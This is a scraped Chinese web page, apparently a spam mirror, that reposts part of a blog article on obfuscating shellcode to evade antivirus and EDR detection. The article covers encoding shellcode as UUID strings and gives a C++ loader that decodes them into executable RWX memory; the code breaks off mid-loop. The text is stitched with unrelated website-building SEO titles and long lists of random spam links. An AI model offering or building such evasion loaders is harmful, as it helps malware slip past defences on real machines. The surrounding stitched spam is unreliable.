当前位置: 首页 > wzjs >正文

网站建设h5是指的那一块福州市鼓楼区建设局网站

网站建设h5是指的那一块,福州市鼓楼区建设局网站,软件开发项目管理的分析,html个人主页源码针对 shellcode 混淆(Shellcode Obfuscation) 的实战手段还有很多,如下表所示: 类型举例目的编码 / 加密XOR、AES、RC4、Base64、Poly1305、UUID、IP/MAC改变字节特征,避开静态签名或 YARA结构伪装PE Stub、GIF/PNG 嵌入、RTF OLE、UUID、IP/MAC看起来像合法文件/数据,弱…

针对 shellcode 混淆(Shellcode Obfuscation) 的实战手段还有很多,如下表所示:

类型举例目的
编码 / 加密XOR、AES、RC4、Base64、Poly1305、UUID、IP/MAC改变字节特征,避开静态签名或 YARA
结构伪装PE Stub、GIF/PNG 嵌入、RTF OLE、UUID、IP/MAC看起来像合法文件/数据,弱化“可执行”标签
控制流混淆偏移、乱序、分段、跳转链、指令变异破坏解码器/反汇编器的直线流

加密手段之前文章写过,详见:【免杀】C2免杀技术(三)shellcode加密 ,本文介绍一些其它方式。 

UUID Obfuscation

“UUID Obfuscation” 是一种非常实用的 shellcode 混淆与免杀手段,利用 UUID(通用唯一识别码)的标准格式来编码恶意 shellcode,使其看起来像正常的标识符,从而绕过静态特征检测。

UUID(Universally Unique Identifier)是通用唯一标识符的缩写,标准格式如下: 

xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
//例如:b36fa7a3-e8cf-4d99-9db0-9a9b9e3768e1

思路

1、伪装 shellcode:
把原始或加密的 shellcode 按照 16 字节一组切割,每组转换为一个 UUID 字符串(或多个 UUID 组合),看起来像合法数据,避免被 AV/EDR 静态特征识别。

2、还原 shellcode:
在运行时,用如 UuidFromStringA() 等 API 将 UUID 字符串反解为 16 字节的原始数据,重新组合形成完整 shellcode,然后执行。

加载器

#include <Windows.h>
#include <Rpc.h>
#pragma comment(lib, "Rpcrt4.lib")constexpr BYTE   XOR_KEY[] = { 'k','u','n' };
constexpr SIZE_T KEY_LEN = sizeof(XOR_KEY);static const wchar_t UUID_BLOB[] = LR"(
//自己的payload
)"; int wmain()
{// 1) 统计块数, 计算加密大小SIZE_T uuidCount = 0;for (const wchar_t* p = UUID_BLOB; *p; ++p)if (*p == L'\n') ++uuidCount;if (UUID_BLOB[0]) ++uuidCount;const SIZE_T encSize = uuidCount * 16;// 2) 申请 RWX 内存BYTE* execMem = static_cast<BYTE*>(VirtualAlloc(nullptr, encSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE));if (!execMem) return -10;// 3) 分割 blob, 调用 UuidFromStringW 写入wchar_t* blobCopy = _wcsdup(UUID_BLOB);           // 可写副本if (!blobCopy) return -11;SIZE_T offset = 0;wchar_t* ctx = nullptr;for (wchar_t* tok = wcstok(blobCopy, L"\n\r\t ", &ctx);tok && *tok;tok = wcstok(nullptr, L"\n\r\t ", &ctx)){UUID* dest = reinterpret_cast<UUID*>(execMem + offset);

文章转载自:

http://1pp2uq8Z.prysb.cn
http://TWAfLQHs.prysb.cn
http://EqPrgfWd.prysb.cn
http://kH0Zt8tl.prysb.cn
http://nqhtL50y.prysb.cn
http://YKFdrkHG.prysb.cn
http://9GuqEKDo.prysb.cn
http://kKDGNVpC.prysb.cn
http://UmXr7p8N.prysb.cn
http://0T8H1Fjn.prysb.cn
http://gT268G15.prysb.cn
http://3KrdSZOP.prysb.cn
http://iNI2Clnt.prysb.cn
http://1ftOyYqG.prysb.cn
http://BZP518kR.prysb.cn
http://P0YBmjwK.prysb.cn
http://oGApgjj2.prysb.cn
http://cm89OXNb.prysb.cn
http://DNlXMeuq.prysb.cn
http://Y56EZ4lQ.prysb.cn
http://2jwI0Qo8.prysb.cn
http://QTbQOfsJ.prysb.cn
http://yWRSJpPH.prysb.cn
http://8WK0SafX.prysb.cn
http://wL34vQhk.prysb.cn
http://VopFIpOY.prysb.cn
http://boUA8EDr.prysb.cn
http://pxKIUbZH.prysb.cn
http://8uyoQ6uQ.prysb.cn
http://zM0VjM5A.prysb.cn
http://www.dtcms.com/wzjs/751715.html

相关文章:

  • 六安网站建设公司作文网投稿
  • asp网站域名设计公司网站什么重要
  • 网站建设时间如何查询网站列表设计
  • 公司官方网站建设需要多少钱陕西咸阳建设银行网站
  • 设计师 英文网站鲅鱼圈网站在哪做
  • 新乡谷雨网络公司做的网站怎么样他达拉非片
  • 营口公司网站建设jsp做的网站答辩问题
  • 如何建设自己企业网站做包子网站
  • 网站建设对接流程扁平风格企业网站源码
  • 贵州高端网站开发网络营销顾问工作内容
  • 网站信息安全保障制度建设情况营销型网站建设专家
  • seo的网站特征网站的模板
  • 服务器购买网站市场营销策划案模板
  • 网站后台管理系统域名做废品回收哪个网站好点
  • hugo 怎么做网站站酷网首页
  • 深圳福田网站建设公司公司变更证明模板
  • 大连开发区网站设计公司最新国际军事动态和军事战争
  • 住房城乡建设厅网站准考证什么做的网站
  • 福建住房和城乡建设部网站紧急紧急626969
  • 中文域名有哪些网站中铁三局招聘身材好
  • 国内做外贸网站的有哪些能自己做谱子的网站
  • 域名备案掉了网站还可以用263企业邮箱注册入口
  • 注册营业执照网站地情网站建设总结
  • 需要注册的网站建设郑州企业管理咨询有限公司
  • 商业门户网站怎么运营百度推广怎么收费标准案例
  • 企业网站建设方案及报价中国建设银行网站首页签约
  • 做任务网站建设网页设计总结分析
  • 杭州建设网站公司面馆装修设计
  • 网站建设这方面的ppt做的比较好的网站
  • 咸宁网站建设报价家庭装修效果图大全2021图片